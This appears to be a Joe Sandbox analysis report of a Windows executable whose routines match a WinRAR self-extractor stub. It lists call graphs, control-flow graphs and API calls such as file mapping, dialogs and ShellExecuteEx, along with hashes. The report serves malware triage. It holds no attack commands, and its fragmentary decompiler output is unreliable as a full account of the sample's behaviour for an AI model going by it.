__ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 29892->29899 29894->28877 29894->28878 29896 b0279b 29895->29896 29898 b02797 29895->29898 29900 b026d2 29896->29900 29898->28882 29899->29894 29901 b02721 29900->29901 29902 b026e4 29900->29902 29908 b05767 29901->29908 29903 b052d8 133 API calls 29902->29903 29906 b02704 29903->29906 29906->29898 29912 b05770 29908->29912 29909 b052d8 133 API calls 29909->29912 29910 b02742 29910->29906 29913 b02c30 29910->29913 29911 b173f8 2 API calls 29911->29912 29912->29909 29912->29910 29912->29911 29914 b02c3c __EH_prolog3_GS 29913->29914 29935 b05365 29914->29935 29916 b02c8f 29926 b02d02 29916->29926 29971 b019a9 26 API calls 29916->29971 29917 b25787 5 API calls 29920 b02d18 29917->29920 29918 b02c5a 29918->29916 29921 b02c91 29918->29921 29922 b02c86 29918->29922 29920->29906 29924 b02cb9 29921->29924 29925 b02c9a 29921->29925 29967 b1888c 28 API calls 29922->29967 29969 b18707 29 API calls 2 library calls 29924->29969 29968 b1880e 28 API calls __EH_prolog3 29925->29968 29926->29917 29928 b02ca7 29929 b025a4 26 API calls 29928->29929 29931 b02caf 29929->29931 29933 b01a66 26 API calls 29931->29933 29932 b02cd2 29970 b02ed0 26 API calls 29932->29970 29933->29916 29936 b05380 29935->29936 29937 b053ca 29936->29937 29938 b053ae 29936->29938 29939 b05634 29937->29939 29943 b053f6 29937->29943 29972 b0204b 89 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 29938->29972 29978 b0204b 89 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 29939->29978 29942 b053b9 29944 b25734 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 29942->29944 29943->29942 29946 b19625 89 API calls 29943->29946 29945 b05659 29944->29945 29945->29918 29951 b05449 29946->29951 29947 b0547b 29948 b0550d 29947->29948 29966 b05472 29947->29966 29975 b12a36 115 API calls 29947->29975 29952 b0fd70 28 API calls 29948->29952 29949 b05477 29949->29947 29974 b0315d 28 API calls 29949->29974 29950 b05467 29973 b0204b 89 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 29950->29973 29951->29947 29951->29949 29951->29950 29953 b05520 29952->29953 29958 b055b9 29953->29958 29959 b055a9 29953->29959 29955 b1909b 118 API calls 29955->29942 29961 b194ea 155 API calls 29958->29961 29960 b0d771 155 API calls 29959->29960 29962 b055b7 29960->29962 29961->29962 29976 b0fd28 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 29962->29976 29964 b055f1 29964->29966 29977 b032d2 89 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 29964->29977 29966->29955 29967->29916 29968->29928 29969->29932 29970->29916 29971->29926 29972->29942 29973->29966 29974->29947 29975->29948 29976->29964 29977->29966 29978->29942 29979 b327e0 29980 b327f2 29979->29980 29981 b327e9 29979->29981 29983 b326d7 29981->29983 29984 b30005 _abort 38 API calls 29983->29984 29985 b326e4 29984->29985 30003 b327fe 29985->30003 29987 b326ec 30012 b3246b 29987->30012 29990 b32703 29990->29980 29993 b32746 30028 b303d4 29993->30028 29995 b32739 29997 b32741 29995->29997 30000 b3275e 29995->30000 30027 b301d3 20 API calls __dosmaperr 29997->30027 29999 b3278a 29999->29993 30034 b32341 26 API calls 29999->30034 30000->29999 30001 b303d4 _free 20 API calls 30000->30001 30001->29999 30004 b3280a __FrameHandler3::FrameUnwindToState 30003->30004 30005 b30005 _abort 38 API calls 30004->30005 30007 b32814 30005->30007 30008 b32898 _abort 30007->30008 30011 b303d4 _free 20 API calls 30007->30011 30035 b2fc3e 38 API calls _abort 30007->30035 30036 b318e1 EnterCriticalSection 30007->30036 30037 b3288f LeaveCriticalSection _abort 30007->30037 30008->29987 30011->30007 30013 b2b543 __fassign 38 API calls 30012->30013 30014 b3247d 30013->30014 30015 b3249e 30014->30015 30016 b3248c GetOEMCP 30014->30016 30017 b324b5 30015->30017 30018 b324a3 GetACP 30015->30018 30016->30017 30017->29990 30019 b3040e 30017->30019 30018->30017 30020 b3044c 30019->30020 30024 b3041c __dosmaperr 30019->30024 30039 b301d3 20 API calls __dosmaperr 30020->30039 30021 b30437 RtlAllocateHeap 30023 b3044a 30021->30023 30021->30024 30023->29993 30026 b328a0 51 API calls 2 library calls 30023->30026 30024->30020 30024->30021 30038 b2e91a 7 API calls 2 library calls 30024->30038 30026->29995 30027->29993 30029 b303df RtlFreeHeap 30028->30029 30030 b30408 __dosmaperr 30028->30030 30029->30030 30031 b303f4 30029->30031 30030->29990 30040 b301d3 20 API calls __dosmaperr 30031->30040 30033 b303fa GetLastError 30033->30030 30034->29993 30036->30007 30037->30007 30038->30024 30039->30023 30040->30033 30041 b24a07 30042 b24910 30041->30042 30043 b24fce ___delayLoadHelper2@8 17 API calls 30042->30043 30043->30042 30044 b01125 30045 b076e7 30 API calls 30044->30045 30046 b0112a 30045->30046 30049 b26029 29 API calls 30046->30049 30048 b01134 30049->30048

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 502 b2454a-b24612 call b16d7b call b11309 call b1f4d4 call b271f0 call b1f89a call b1f84c GetCommandLineW 515 b24618-b2463c call b014a7 call b219ee call b01a66 502->515 516 b246f9-b24722 call b113f9 call b025a4 call b01a66 502->516 531 b24642-b24659 OpenFileMappingW 515->531 532 b246dc-b246eb call b014a7 call b23efc 515->532 529 b24724 516->529 530 b24729-b24831 SetEnvironmentVariableW GetLocalTime call b0f6ba SetEnvironmentVariableW GetModuleHandleW LoadIconW call b207e5 call b13538 call b1d255 * 2 DialogBoxParamW call b1d347 * 2 516->530 529->530 566 b24833-b24834 Sleep 530->566 567 b2483a-b24841 530->567 535 b246d2-b246da CloseHandle 531->535 536 b2465b-b24669 MapViewOfFile 531->536 543 b246f0-b246f4 call b01a66 532->543 535->516 536->535 539 b2466b-b24687 UnmapViewOfFile MapViewOfFile 536->539 539->535 540 b24689-b246cc call b1fc38 call b23efc call b15109 call b151bf call b151f8 UnmapViewOfFile 539->540 540->535 543->516 566->567 568 b24843 call b1fb4b 567->568 569 b24848-b24865 call b15041 DeleteObject 567->569 568->569 573 b24867-b24868 DeleteObject 569->573 574 b2486e-b24874 569->574 573->574 575 b24876-b2487d 574->575 576 b2488e-b2489c 574->576 575->576 577 b2487f-b24889 call b094b8 575->577 578 b248b0-b248bd 576->578 579 b2489e-b248aa call b23fcf CloseHandle 576->579 577->576 582 b248e1-b248e5 call b1f53a 578->582 583 b248bf-b248cb 578->583 579->578 588 b248ea-b24903 call b25734 582->588 586 b248db-b248dd 583->586 587 b248cd-b248d5 583->587 586->582 590 b248df 586->590 587->582 589 b248d7-b248d9 587->589 589->582 590->582
                                                APIs
                                                  • Part of subcall function 00B16D7B: GetModuleHandleW.KERNEL32(kernel32,5EA84158), ref: 00B16DC7
                                                  • Part of subcall function 00B16D7B: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00B16DD9
                                                  • Part of subcall function 00B16D7B: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00B16E03
                                                  • Part of subcall function 00B11309: __EH_prolog3.LIBCMT ref: 00B11310
                                                  • Part of subcall function 00B11309: GetCurrentDirectoryW.KERNEL32(00000000,00000000,0000000C,00B117FB,?,?,\\?\,5EA84158,?,?,?,00000000,00B3A279,000000FF), ref: 00B11319
                                                  • Part of subcall function 00B1F4D4: OleInitialize.OLE32(00000000), ref: 00B1F4ED
                                                  • Part of subcall function 00B1F4D4: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00B1F524
                                                  • Part of subcall function 00B1F4D4: SHGetMalloc.SHELL32(00B5532C), ref: 00B1F52E
                                                • GetCommandLineW.KERNEL32 ref: 00B24608
                                                • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp,?,00000000), ref: 00B2464F
                                                • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000009,?,00000000), ref: 00B24661
                                                • UnmapViewOfFile.KERNEL32(00000000,?,00000000), ref: 00B2466F
                                                • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,?,?,00000000), ref: 00B2467D
                                                  • Part of subcall function 00B1FC38: __EH_prolog3.LIBCMT ref: 00B1FC3F
                                                  • Part of subcall function 00B23EFC: __EH_prolog3_GS.LIBCMT ref: 00B23F03
                                                  • Part of subcall function 00B23EFC: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?,?,?,?,?,?,00000028), ref: 00B23F1B
                                                  • Part of subcall function 00B23EFC: SetEnvironmentVariableW.KERNEL32(sfxpar,?,?,?,?,?,?,?,00000028), ref: 00B23F86
                                                  • Part of subcall function 00B151BF: _wcslen.LIBCMT ref: 00B151E3
                                                • UnmapViewOfFile.KERNEL32(00000000,00B55430,00000400,00B55430,00B55430,00000400,00000000,00000001,?,00000000), ref: 00B246CC
                                                • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00B246D3
                                                • SetEnvironmentVariableW.KERNEL32(sfxname,00B49698,00000000), ref: 00B2472F
                                                • GetLocalTime.KERNEL32(?), ref: 00B2473A
                                                • _swprintf.LIBCMT ref: 00B24779
                                                • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 00B2478E
                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00B24795
                                                • LoadIconW.USER32(00000000,00000064), ref: 00B247AC
                                                • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_00020900,00000000), ref: 00B24803
                                                • Sleep.KERNELBASE(00001B58), ref: 00B24834
                                                • DeleteObject.GDI32 ref: 00B24858
                                                • DeleteObject.GDI32(00050E80), ref: 00B24868
                                                  • Part of subcall function 00B014A7: _wcslen.LIBCMT ref: 00B014B8
                                                  • Part of subcall function 00B219EE: __EH_prolog3_GS.LIBCMT ref: 00B219F5
                                                • CloseHandle.KERNEL32 ref: 00B248AA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: File$EnvironmentHandleVariableView$AddressCloseDeleteH_prolog3H_prolog3_ModuleObjectProcUnmap_wcslen$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingOpenParamSleepStartupTime_swprintf
                                                • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                                • API String ID: 3142445277-3710569615
                                                • Opcode ID: ea97386e7ae6edefa3d98c3fd0151ea9ee44ef0f928b202cafca412b5b487452
                                                • Instruction ID: ba6caa49a257bd323007a4f0e3f423103ff7b78970ffdb3043593231a03a6104
                                                • Opcode Fuzzy Hash: ea97386e7ae6edefa3d98c3fd0151ea9ee44ef0f928b202cafca412b5b487452
                                                • Instruction Fuzzy Hash: BD91CE71504754EFD320AB64EC55BAF7BE8EB49702F800899F949A3292EF74A944CB21

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 608 b1ebd3-b1ebf0 FindResourceW 609 b1ebf6-b1ec07 SizeofResource 608->609 610 b1ecec 608->610 609->610 612 b1ec0d-b1ec1c LoadResource 609->612 611 b1ecee-b1ecf2 610->611 612->610 613 b1ec22-b1ec2d LockResource 612->613 613->610 614 b1ec33-b1ec48 GlobalAlloc 613->614 615 b1ece4-b1ecea 614->615 616 b1ec4e-b1ec57 GlobalLock 614->616 615->611 617 b1ecdd-b1ecde GlobalFree 616->617 618 b1ec5d-b1ec7b call b26c70 CreateStreamOnHGlobal 616->618 617->615 621 b1ecd6-b1ecd7 GlobalUnlock 618->621 622 b1ec7d-b1ec9f call b1eb06 618->622 621->617 622->621 627 b1eca1-b1eca9 622->627 628 b1ecc4-b1ecd2 627->628 629 b1ecab-b1ecbf GdipCreateHBITMAPFromBitmap 627->629 628->621 629->628 630 b1ecc1 629->630 630->628
                                                APIs
                                                • FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00B20845,00000066), ref: 00B1EBE6
                                                • SizeofResource.KERNEL32(00000000,?,?,?,00B20845,00000066), ref: 00B1EBFD
                                                • LoadResource.KERNEL32(00000000,?,?,?,00B20845,00000066), ref: 00B1EC14
                                                • LockResource.KERNEL32(00000000,?,?,?,00B20845,00000066), ref: 00B1EC23
                                                • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,?,00B20845,00000066), ref: 00B1EC3E
                                                • GlobalLock.KERNEL32(00000000), ref: 00B1EC4F
                                                • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00B1EC73
                                                • GlobalUnlock.KERNEL32(00000000), ref: 00B1ECD7
                                                  • Part of subcall function 00B1EB06: GdipAlloc.GDIPLUS(00000010), ref: 00B1EB0C
                                                • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00B1ECB8
                                                • GlobalFree.KERNEL32(00000000), ref: 00B1ECDE
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
                                                • String ID: PNG
                                                • API String ID: 211097158-364855578
                                                • Opcode ID: 1025e6c8db1ccf221053d140fec006ea7835e96111c83b525d8813f88e72036a
                                                • Instruction ID: da28e6a33abcb3aad77e3792156b2017ae5aecf6dbfc527b01db455dbca876bf
                                                • Opcode Fuzzy Hash: 1025e6c8db1ccf221053d140fec006ea7835e96111c83b525d8813f88e72036a
                                                • Instruction Fuzzy Hash: 0D316775600702ABD7209FA1ED48E6BBFACFB85750B200569FD25E3261EF31D850DBA0
                                                APIs
                                                  • Part of subcall function 00B18781: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,5EA84158,00000007,?,?,?,00B18751,?,?,?,?,0000000C,00B04426), ref: 00B1879D
                                                • _wcslen.LIBCMT ref: 00B1395A
                                                • __fprintf_l.LIBCMT ref: 00B13AA7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: ByteCharMultiWide__fprintf_l_wcslen
                                                • String ID: ,$$%s:$*messages***$*messages***$@%s:$RTL
                                                • API String ID: 1796436225-285229759
                                                • Opcode ID: 86be9b54683fbdbb4236cd5cd024e80f7bd6a360567ed491ce47d0ed9ac5e1ac
                                                • Instruction ID: 38cdc4af5a9852b26bec94fdba6e1408e0d4456a0cdc47f3dda62622064cbaca
                                                • Opcode Fuzzy Hash: 86be9b54683fbdbb4236cd5cd024e80f7bd6a360567ed491ce47d0ed9ac5e1ac
                                                • Instruction Fuzzy Hash: BA52C671900259EBDF24DFA8DC85AEEB7F4FF04710F9005AAE415E7291E7719A84CB90

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1006 b0f826-b0f841 call b257d8 1009 b0f925-b0f935 FindNextFileW 1006->1009 1010 b0f847-b0f84d 1006->1010 1011 b0f937-b0f946 GetLastError 1009->1011 1012 b0f948-b0f9fa call b025c3 call b014a7 call b1229d call b01a66 call b17c44 * 3 1009->1012 1013 b0f851-b0f864 FindFirstFileW 1010->1013 1014 b0f84f 1010->1014 1015 b0f91d-b0f920 1011->1015 1018 b0f9ff-b0fa0a call b25787 1012->1018 1013->1012 1017 b0f86a-b0f88e call b1169a 1013->1017 1014->1013 1015->1018 1024 b0f890-b0f897 1017->1024 1025 b0f8ac-b0f8b6 1017->1025 1028 b0f899 1024->1028 1029 b0f89c-b0f8aa FindFirstFileW 1024->1029 1030 b0f8b8-b0f8d3 1025->1030 1031 b0f8fd-b0f900 1025->1031 1028->1029 1029->1025 1033 b0f8f4-b0f8fc call b25726 1030->1033 1034 b0f8d5-b0f8ee call b019a9 1030->1034 1031->1012 1036 b0f902-b0f90b GetLastError 1031->1036 1033->1031 1034->1033 1040 b0f91b 1036->1040 1041 b0f90d-b0f910 1036->1041 1040->1015 1041->1040 1045 b0f912-b0f915 1041->1045 1045->1040 1047 b0f917-b0f919 1045->1047 1047->1015
                                                APIs
                                                • __EH_prolog3_GS.LIBCMT ref: 00B0F830
                                                • FindFirstFileW.KERNELBASE(?,?,00000274,00B0F733,000000FF,00000049,00000049,?,?,00B0A684,?,?,00000000,?,?,?), ref: 00B0F859
                                                • FindFirstFileW.KERNEL32(?,?,?,?,?,00B0D303,?,?,?,?,?,?,?,5EA84158,00000049), ref: 00B0F8A4
                                                • GetLastError.KERNEL32(?,?,?,00B0D303,?,?,?,?,?,?,?,5EA84158,00000049,?,00000000), ref: 00B0F902
                                                • FindNextFileW.KERNEL32(?,?,00000274,00B0F733,000000FF,00000049,00000049,?,?,00B0A684,?,?,00000000,?,?,?), ref: 00B0F92D
                                                • GetLastError.KERNEL32(?,00B0D303,?,?,?,?,?,?,?,5EA84158,00000049,?,00000000), ref: 00B0F93A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: FileFind$ErrorFirstLast$H_prolog3_Next
                                                • String ID:
                                                • API String ID: 3831798110-0
                                                • Opcode ID: 7d9e6b6427e6ce1655877afb2847385ddbff6ce88936266695271b916b7c687b
                                                • Instruction ID: 0a7ab4bd06cbd93d0964c7a85e4949efe43784001aa35afd5f0073d7efd7395e
                                                • Opcode Fuzzy Hash: 7d9e6b6427e6ce1655877afb2847385ddbff6ce88936266695271b916b7c687b
                                                • Instruction Fuzzy Hash: F3511F71905619DBCF24DF64C889AEDBBF4FB09320F6042E9E419A3690DB30AA84CF50
                                                APIs
                                                • _wcslen.LIBCMT ref: 00B0C342
                                                  • Part of subcall function 00B12095: __EH_prolog3_GS.LIBCMT ref: 00B1209C
                                                  • Part of subcall function 00B057C0: __EH_prolog3.LIBCMT ref: 00B057C7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: H_prolog3H_prolog3__wcslen
                                                • String ID: __tmp_reference_source_
                                                • API String ID: 1523997010-685763994
                                                • Opcode ID: 5185972b4f5b20fb660e9fc3573799168bb93d5a4d08405dae98d62b81d4b04b
                                                • Instruction ID: e714f4fea19cd45f780c62d0a9c1804861b1877ad0b659e2e41bee54979754e5
                                                • Opcode Fuzzy Hash: 5185972b4f5b20fb660e9fc3573799168bb93d5a4d08405dae98d62b81d4b04b
                                                • Instruction Fuzzy Hash: B3D2B3719042899FDB25DFA4C891BEEBFF4FF05304F0446AAE49A972C1DB34A949CB50
                                                APIs
                                                • GetCurrentProcess.KERNEL32(00000000,?,00B2EC80,00000000,00B46F40,0000000C,00B2EDD7,00000000,00000002,00000000), ref: 00B2ECCB
                                                • TerminateProcess.KERNEL32(00000000,?,00B2EC80,00000000,00B46F40,0000000C,00B2EDD7,00000000,00000002,00000000), ref: 00B2ECD2
                                                • ExitProcess.KERNEL32 ref: 00B2ECE4
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: Process$CurrentExitTerminate
                                                • String ID:
                                                • API String ID: 1703294689-0
                                                • Opcode ID: d8e90b440b35e3648850a083c5f969f03f6001d60025e796dd66c433555dedba
                                                • Instruction ID: 8e6812185c7771edc439c48ee21dbce91fec196a59439356d6ea97a3a3c71f24
                                                • Opcode Fuzzy Hash: d8e90b440b35e3648850a083c5f969f03f6001d60025e796dd66c433555dedba
                                                • Instruction Fuzzy Hash: 2FE0B636000658AFCF116F96EE09A5C7FA9EF51781F1414A4F959AB122CB36ED42DB40
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: H_prolog3
                                                • String ID:
                                                • API String ID: 431132790-0
                                                • Opcode ID: 74530c972737399332223124a51e05b53dd12470047abe4c9997ee6b5fdadc5b
                                                • Instruction ID: 4a999be7db822583c17acb2f5951d56037d1e872fd4430568936670eb0c4b0c9
                                                • Opcode Fuzzy Hash: 74530c972737399332223124a51e05b53dd12470047abe4c9997ee6b5fdadc5b
                                                • Instruction Fuzzy Hash: 28E1A2716083458FDB24DF28C984B9BBBE1FF88304F4445ADE8899B346D734E985CB92
                                                APIs
                                                • __EH_prolog3_catch_GS.LIBCMT ref: 00B2090A
                                                  • Part of subcall function 00B01E44: GetDlgItem.USER32(00000000,00003021), ref: 00B01E88
                                                  • Part of subcall function 00B01E44: SetWindowTextW.USER32(00000000,00B3C6C8), ref: 00B01E9E
                                                • EndDialog.USER32(?,00000000), ref: 00B20A18
                                                • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00B20A57
                                                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00B20A71
                                                • IsDialogMessageW.USER32(?,?), ref: 00B20A84
                                                • TranslateMessage.USER32(?), ref: 00B20A92
                                                • DispatchMessageW.USER32(?), ref: 00B20A9C
                                                • EndDialog.USER32(?,00000001), ref: 00B20ADE
                                                • GetDlgItem.USER32(?,00000068), ref: 00B20B04
                                                • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00B20B1F
                                                • SendMessageW.USER32(00000000,000000C2,00000000,00B3C6C8), ref: 00B20B32
                                                • SetFocus.USER32(00000000), ref: 00B20B39
                                                • GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 00B20C20
                                                • GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 00B20C4C
                                                • GetTickCount.KERNEL32 ref: 00B20C79
                                                • GetLastError.KERNEL32(?,00000011), ref: 00B20CD5
                                                • GetCommandLineW.KERNEL32 ref: 00B20DF9
                                                • _wcslen.LIBCMT ref: 00B20E06
                                                • CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,?,winrarsfxmappingfile.tmp,?,00B55430,00000400,00000001,00000001), ref: 00B20E85
                                                • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000), ref: 00B20EA3
                                                • ShellExecuteExW.SHELL32(0000003C), ref: 00B20EDC
                                                • WaitForInputIdle.USER32(?,00002710), ref: 00B20F0B
                                                • Sleep.KERNEL32(00000064), ref: 00B20F25
                                                • UnmapViewOfFile.KERNEL32(?,?,?,?,?,?,?,00B55430,00000400), ref: 00B20F61
                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,00B55430,00000400), ref: 00B20F6D
                                                • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00B21072
                                                  • Part of subcall function 00B01E1F: GetDlgItem.USER32(?,?), ref: 00B01E34
                                                  • Part of subcall function 00B01E1F: ShowWindow.USER32(00000000), ref: 00B01E3B
                                                • SetDlgItemTextW.USER32(?,00000065,00B3C6C8), ref: 00B2108A
                                                • GetDlgItem.USER32(?,00000065), ref: 00B21093
                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 00B210A2
                                                • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_000206D0,00000000,?), ref: 00B21422
                                                • EndDialog.USER32(?,00000001), ref: 00B21436
                                                • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00B210B1
                                                  • Part of subcall function 00B1E265: __EH_prolog3_GS.LIBCMT ref: 00B1E26C
                                                  • Part of subcall function 00B1E265: ShowWindow.USER32(?,00000000,00000038), ref: 00B1E294
                                                  • Part of subcall function 00B1E265: GetWindowRect.USER32(?,?), ref: 00B1E2D8
                                                  • Part of subcall function 00B1E265: ShowWindow.USER32(?,00000005,?,00000000), ref: 00B1E373
                                                • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00B2114F
                                                • SendMessageW.USER32(?,00000080,00000001,00070459), ref: 00B21284
                                                • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,00050E80), ref: 00B2129D
                                                • GetDlgItem.USER32(?,00000068), ref: 00B212A6
                                                • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 00B212BE
                                                • GetDlgItem.USER32(?,00000066), ref: 00B212E6
                                                • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 00B2135D
                                                • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00B21371
                                                • EnableWindow.USER32(?,00000000), ref: 00B215A7
                                                • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 00B215E8
                                                • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00B2160D
                                                  • Part of subcall function 00B21D4F: __EH_prolog3_GS.LIBCMT ref: 00B21D59
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
